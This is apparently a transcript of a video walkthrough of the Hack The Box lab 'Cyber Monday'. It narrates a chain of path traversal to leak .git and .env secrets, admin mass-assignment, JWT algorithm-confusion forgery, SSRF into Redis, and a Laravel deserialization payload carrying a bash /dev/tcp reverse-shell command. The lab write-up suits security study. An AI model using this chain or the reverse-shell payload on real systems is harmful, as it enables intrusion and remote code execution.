Hey, what's going on? We're going to be taking a look at Cyber Monday today from Hack the Box. So, just a quick note, I did complete the box when it first came out. Um, it's quite a tough box, but what made it even tougher when it originally came out was the fact that it's a seasonal machine, and for whatever reason, they always just crash. Like, you can hit it with one Go Buster and it will just crash. Like, it will just go really slow. And if, you've got 3 or 4, even 20, 30, 40 people doing it at once, it crashes. And so getting the box done, I'm trying to record for a pre-release would be impossible. It would just take too much time and it would be super annoying. Um, so I'm gonna record now. I didn't take many notes, so you know that's that. And we also aren't gonna be Preveskin. I may cover that in another video. I just want to show how to gain access because I thought it was a pretty cool chain. I may also leave in the description how to Prevesk because it involves setting up chisel or creating a scan script to go through a lot of hosts. I don't know how many. It generates randomly, so the IP is generated randomly. So I can't tell you, but yeah. So we're gonna start off with an nmap default script, service enumeration, verbose, all ports. The Cybermonday.hp will resolve to the IP that I have in my etc host. We have 22, which we presume is SSH without the actual return of the service enumeration, and 80. So I've already created an account. Just simply go up here, click sign in, click register, enter your credentials, and you'll be onto the box. Web technologies, we have NGINX, PHP, and React. They're the main ones that I focus on. We can view our profile, we can change stuff. We have a password and password confirmation here, not to specifically tell us that we need to enter our current password, which in itself is a flaw. Because if we have a bug to chain that with, we can get an account takeover. And just to confirm that, we can do like test and we can update the username. And you can see it doesn't even require us to have these fields set, which is strange. Yeah, I'm not too sure if that's intended or not by the developer. I assume it is. But yeah, what we can do is, when I was go bustering, I'm not going to go buster because as I said the machines do get slow, is view assets, which was one of the directories that were returned during my initial go buster scan. And we can see that there is a directory, you can see that. And we know that, well, we don't know yet, but there's two ways to tell if we're running Laravel. One would be via triggering the error, which I'll show you how, and two would be by scanning this endpoint and finding an alias misconfiguration. So because it is running NGINX, whenever I see NGINX and I see a 403, I try something called an alias misconfiguration, which basically is a path reversal. So if we do // and then we know there's a .get, which, as I said, I found via scanning with GoBuster, we could download that. But obviously, 403 is here because we need to specify something on the end right here to download. So, like, I don't know. Oops. You specify the protocol. Something like head, for example, and you can see that downloads. So we can use git dumper to dump the source code, and then we can also download the .env file. Oops. .env, which will be useful. You can see that we have the app key, which will be useful for decrypting Laravel session cookies. We can see that they used memcached, and we can see that they have Redis on port 6379 default port, and we have the Redis prefix Laravel_session. That is all the key detail that we need from here. You can see that it's mounting something, changelog.txt, and yeah, that's about all. So yeah, initially identifying that was pretty difficult. My friend actually found it really easily. Like, it wasn't difficult, it was just because I didn't think that they would include it in a CTF, but hey. My friend, funny story, my friend ran, what was it? Nuclei with a template, and it ended up finding it for him, so yeah, he had the easy route to finding that. So we can dump it using git dumper, Python 3 git dumper.py, cybermonday.hb, assets path traversal.git, and then just like the folder that you want to output all of the source code to. And you can see that I already have it right here. And so the first thing we're going to go into is app, HTTP controllers, and profile controller. You can see right here, it does actually attempt to check if the password is empty. Now, I think that it only checks and ensures that the password field is not empty. But if the password field was present in the request but is empty, then it will still pass this check. So that in itself is a flawed check, and it's an implicit validation vulnerability thing. So this right here fails to check if an actual value is specified. So yeah, that's the first thing, but the actual password doesn't match thing is valid. And then we have so if I haven't mentioned, we could already use this to chain, but we don't have a chain yet. And now we can go down to models and we can come to user.php. And you can see that this has something called protected casts, which have is admin, which is going to be a boolean. So this could be a way to set is_admin to true potentially, or is_admin to 1, which may make us admin. So we can see they're using bcrypt. So that's another thing, and then you can see we have product.php. If we come down to routes, I believe, and we see web.php, we can see this dashboard, which is for admins. So if we try to visit /dashboard, we should be sent back to home profile. Yeah. So we need to figure out how to make ourselves admin. Now if we do Cybermonday, or we can do admin at cybermonday.hb, you can also see that they have Laravel Debug Mode enabled. This is just telling me there's a duplicate entry. In other words, we can't make ourselves the email that's already in the database. And so you can see right here, there's also, right here, you can see there's also this is admin. So yeah, that's another indication. Also, you got this get stuff right here for the latest git commit. So yeah, that's that. Now we can try setting ourselves as admin. So we're gonna have to modify that email. We're gonna get an error. So we can just change that to j at cybermonday.htb, and we can just do is admin equals true, which you'll see gives us an error. And the error just basically says incorrect integer, so it has to be an integer. And that worked. So if we come back and refresh, we see dashboard, which means we are admin. We come to products, we have a file upload. I was going to mess with this originally, but I came to changelog and I found this webhook option, which took us to a separate vhost, which, as again, I already have in my EC hosts. And you can see we have some API endpoints. So we're just going to incept this and send it to repeater. We're going to create an account. So we'll change this to /auth/register. This is going to have to be application/JSON. and then we'll just specify username J, password J, and that was successful. Now we can do auth login, and we do get a JWT, which we can go into a text editor, and we'll just take note of this JWT. So we can go to jwt.io and decode the JWT. So you can see the algorithm is RS256. Now whenever I see that set as the algorithm rather than HS256, I always think of the algorithm confusion attack, which essentially, if we can get the public key, we can sign our own JWTs via algorithm confusion. I'm not going to go too in depth in that. If you want a video specific to JWT attacks, you can comment, and I may consider doing one in the future. Alternatively, you can purchase the Hackbox module that I created on authorization and authentication attacks, which does go in depth with JWT. I can't remember if it does this exact attack or not. So you can see that our ID is 6, username is J, and the role is user. So for people that don't understand JWT, we can't just, well, we can if it's misconfigured, but in this case we can't just change our role to admin and go ahead and go, yeah, it's done. We need to, in this case, get the public key some way, somehow, and with that, whenever I see that, we can use something called JWKS, which I think stands for JSON Web Keys, which is like, and then you got JSON Web Keys S, which stands for set. I'm not sure if it's supposed to be a plural or not for multiple, but if we navigate to this, we do actually see we get something. Now, this isn't regular base64, so like you can't just decode this. It needs a specific byte order. So if we do like allow pasting, and then we do something like atob, which is a JavaScript function to decode base64, you can see it gives an invalid character detection. So we need to pretty much decode this. So because for whatever reason my VM doesn't allow me to copy and paste, I have it set to bidirectional, and I've installed the guest edition stuff, and it worked correctly, but for whatever reason it's just not working. We're gonna have to use code share. Strange, I know, but hey, we've got to do what we've got to do. So I'm gonna pop into code share. I'm gonna copy this, and I'm gonna open up my my script that I wrote. To explain this, we have two functions. The first function takes the n value, which is that long value we just copied as an input, decodes it and returns the integer value. As you can see, it uses the base64 library, and it will convert, it will decode the base64 string and then convert the decoded bytes into an integer using a specified byte order, which I specified right here as big, and then it will return the long integer. So we can just run that such as python3 decode.py, and we can paste that in, and we get no module named crypto. Just make sure that may have not that may have been referenced in something else. No, okay. PyCryptoDome, I believe it is. And it says we already have it, which is strange. 2 seconds. Okay, I just realized that this was in a completely different file. I was trying to run decode.py, which was something completely different, and I accidentally put this script inside of scan.sh because I was recording this video earlier and I was facing that exact issue when I have PyCryptoDome and I have all of the PyCrypto libraries, but it wasn't working. I was a bit confused. So yeah, we just do that and we're all good. That should run now. Yeah. Anyone that saw that, yeah, That's embarrassing, but it's fine. So now it works. You can see we get the output. And now what we're going to do is we're going to pass in deco.py, and now we're going to pass in that value followed by the AQAB value. And if I didn't even explain what this function does. So the generate public key basically takes two integers, n and e. The n is going to be the large integer that's already been decoded, and e is going to be the small AQAB, which represents the public exponent. And then what we're going to do is we are going to use the cryptography library, as you can see it's imported up there, to generate an RSA public key, and then from there it's basically serialized into a PEM format, and then returned as a string. So yeah, if we see that, we get the public key output, and that's now ready for the attack. So if we come back to my VM and we go back here, we have it ready all here, and we're gonna go into Burp Suite, and we're gonna go to extensions, App Store, and you can search for JWT or JSON Web Tokens. Install both of these, JWT Editor and JSON Web Tokens. Come to JWT Editor and click New Symmetric Key, click Generate, and on this key parameter, or K, we're gonna oh no, my apologies, we gotta go to decoder, paste this, and copy the basics for encoded version, and now do that again. And this will allow us to sign the JWT for the attack. So we're gonna create a new thing, tab, and we're just gonna specify the header, and followed by the token, which I'm copying right here. And we're going to go to webhooks/create. This takes a name, a description, and a action, which is going to be send request. And you can confirm that by going to here, and as you can see, we got webhooks create, name, description, action. We come down to the actions, we got send request and create log file. So yeah, now what we're going to do is we're just going to send the request. You can see we're unauthorized, and we can presume that we need to change the user role to admin. So copy your JWT. If you can edit inside of the JSON Web Tokens, for whatever reason it doesn't allow me to, come over here, modify the algorithm to be HS256 and the role to be admin. And as you can see, signature verified. We can come over, go into Burp Suite, and if we try to send that, it's still not going to work because we haven't signed it yet. So we're going to sign it using that public key, but we've switched the algorithm to HS256, which will now allow us to sign without a private key or anything, just public key. So we click sign, don't modify anything, boom, and if we go back, we should be able to send, and you can see we are authenticated as an admin, and we can interact with the webhook. Now, if we create a new one, we go to webhooks/UUID. Once again, you can reference to the documentation right here. Webhooks UUID takes URL and a method. So we're going to go here, we're going to go to URL. Actually, no, this needs to be URL. This is just going to be my IP, which we're filling in a second, and method is going to be a get. And we don't need the action. Okay, so let me just grab my box IP. And I'm going to pass that in. For whatever reason, my VM froze for a second. And we're just going to start a listener on port 80. And we're going to send that. And as you see, it does return everything that's in here. And that is intended, right? Webhooks are intended to request ourselves. The issue of webhooks, well, the biggest issue with a webhook is supposed to, request something externally, so you can't whitelist them. You can't say you are limited to only accessing facebook.com or google.com, right? The issue with them, like with specifically with whitelists, are they're not very practical when your user wants to access google.com, right, or something that's not within the whitelist. So they resort to using blacklists to prevent SSRF. Now, the issue with that is there's so many ways to like contact localhost, right? Like so many ways. Like huge. Like I can't even like yeah okay. Anyway, there's so many ways. So a blacklist is insufficient, but they try to make it work. And the issue with that is the only real way to really have an effective block against SSRF is a blacklist combined with a network segmentation kind of drop. So if it requests localhost at all, drop the request, block it. But that, for whatever reason, isn't implemented very often. So yeah, what we can do is we can try request localhost. I'll just use HTTP 0, which, as you can see, ping 0 returns localhost. There's many ways. I'm not going to show you all of the ways. And it says URL is not live. Okay. We've seen they had Redis. Now, Redis over HTTP has had a, I guess you can call it a nerf, where essentially if you send a request, so let's say you like connect to netcat, right? So let's say you netcat 1006379, right? Now we're connected to Redis, okay? At this point we send a get, right, to /srf.php URL equals payload inside of Redis, okay? We're inside of Redis while we type that. What's going to happen is it's going to say error, wrong number of arguments for get, and then it's also going to identify that it's a valid command, but you're doing it over HTTP. So if you try that over HTTP, it's going to mention this host param right here, and because it sees the host, it just drops the request. The way that we can bypass that is if we can control the method, because with them we can send a valid non-HTTP method such as set, and that will be SSRF to Redis. Okay, so we can pass set in here, and then we can reach Redis internally via Redis 6379, and you can see that responds right away compared to as how it was responding before, where it was taking a long time. And so now we can start messing with Redis. One way to confirm whether or not we do have a valid, Redis command is via like a slave of request, which does work, but I don't want to send one because it messes up the box. But originally I did have to, like it was the only way that I could think of getting a connection back so I could determine whether or not this is actually working. So yeah, basically the issue, the thing with this is it doesn't include the host inside of the request. So we have a bypass here because we can control the method, right? So the server that's initiating the request. Alright, how do I explain this? So we have a server that's initiating a request, and that inside of that request we're initiating another request using set. So we're still posting data, but the post isn't being included in the request of the SSRF server, which the vulnerable part of the server is initiating. Therefore, we can interact with Redis, assuming that we don't use get and we use set, or another Redis command that isn't a HTTP method. So yeah. Now what we have is the so I'm quickly gonna go grab a drink and then I'll be back because my throat's hurting, and then I'll explain what we're gonna go and do. Okay, I'm back. So yeah, as I was saying, we need to figure out a way that we can attack from here. So one way is Redis, using the SSRF to Redis to RC via serialized and unserialized. So in a short, Redis is often used as a session driver to store data, session data specifically. Laravel itself provides multiple of these session drivers, I guess, and Redis is one of them. Let's say that in this case we are using Redis as a session driver. Laravel automatically serializes and deserializes session data, including like session cookies, without you actually having to use serialize or unserialize in the backend code. So you can't search for unserialized and serialized in the backend because it's just not going to work. But the way that this works is, let's say that we make a request to refresh the page, right? Laravel retrieves the session data from Redis and then automatically deserializes it using unserialize. And so if we get the app key, we can decrypt the Laravel session cookie, and then we can send a request with that decrypted session cookie into Redis with a deserialized payload, and then that will go into the Redis queue, and then when we refresh, it will be unserialized and we should have good execution. That's the goal. That's what we're going to do. So the first thing we're going to crack on with is getting a gadget. So you can use PHP GGC, which I already have installed right here. And so we're just going to run PHP GGC A for ASCII Laravel RC10 system, which is going to be the function executing the malicious code. Bash taci and slash dev tcp 1010 14 37 13370 and 1. And you can see right here we get our payload. The next thing that we've got to do is grab the, I think I actually have it in here. Where did I put that? Okay, you know what we should read it. Is get the test.py file, which I'm going to create, which will decrypt the Laravel session cookie. So if we just decrypt Laravel session cookie hat tricks, and we copy this, we can pop into a nice mouse pad and we just call this test.py. Oops, that must not have copied. There we go. And the first thing we can get rid of is this right here. We need to add a print onto this decrypt cookie. We need to remove all of this data, which was a cookie, and we're going to add our own, and then we also need to replace the app key. So the first thing I'm going to do is cat home j downloads, and then untitled. I have quite a lot in there. .env, and we're going to grab that app key. And now we have the app key. We're going to pass in the cookie, our session cookie. So we're going to come to Cybermonday. We'll just go back to home. It doesn't really matter, but we'll come in here and we'll get the Cybermonday cookie. We'll drop this in and we'll remove %3d and we'll add a padding, and yeah, that should be good. So we'll open up the other terminal with Python 3 test.py, and you can see that we get the decrypted session cookie, which is going to be the second part of what we need here. So we're going to have to format this. So we're going to have to format this correctly. So I'm going to quickly go format this, and then I'll walk you through the steps for formatting, as it's pretty boring. So yeah. Okay, so I'm about to escape the JSON. So I'm using freeformatter.com, and we're just going to click escape, and we're going to copy that. We're going to come back here, and we're just going to paste this in, and we're going to shut that off. We're going to copy these new lines. We're going to add them, and this should be good to go. Let's pop this into Burp Suite. So I got my decrypted Laravel session, I've got the prefix, I have the payload. Okay. So let's set our session and our netcat listener, and we're going to send that. We're going to come back, we're going to refresh the page, and it refreshed, so something went wrong there. So potentially, I believe my IP is still the same. 1010 1437, 1010 1437, and 1337. So potentially could be the formatting. I'm not too sure what exactly could have caused that. Actually, potentially, yeah, I'm not too sure. Okay, I'm just gonna go brainstorm, see why this isn't working, and then once I figure it out, I shall be back. Okay, so I think I may have found the issue, which was with the formatting. So I had like the way that I didn't have a space here. I don't know if that would cause the issue. So I got logged out. Okay. I think it was like j at j.htb and j. Okay, I forgot my email. I would just call this 012.012.012.com, and we'll quickly log back in. We'll just grab our new session. Oh. Yeah, so we'll just grab our new session and we will set that. Okay. Let's grab that and we will pass that in there. Everything looks fine. We'll send that. Refresh. I didn't have my listener. Okay, let me just figure out what's going on and then I'll be back. Okay, we're just going to see if this works. We'll send. Refresh. And that seems to have gave us a shell, so I think it was just like the second time round, like just before I paused the video, it didn't seem to give me a shell because I wasn't listening, and then of course it logged me out because we changed our session. So yeah, there you go, that's how you get onto the container. From here you can start enumerating the box. I will show you something that will be useful if you go into mount and you go into .sh and you can't authorize keys. You can see you have John at Cybermonday.htb. Well, it'll be John at Cybermonday.htb when you SSH him, but yeah, that's the SSH user. But yeah, if you want some tips, enumerate the internal hosts, and yeah. From here you have to do source code review, and once you get onto the second thing, you're gonna have to extract creds from memory, and then you have to exploit a vulnerability in this Python script, and then you become root. So yeah, I hope you enjoyed. I may do a part 2. If you want to see it, just comment down below, and you know, if I see enough comments, I'll decide to do it, assuming that the box stays active. And yeah, take care.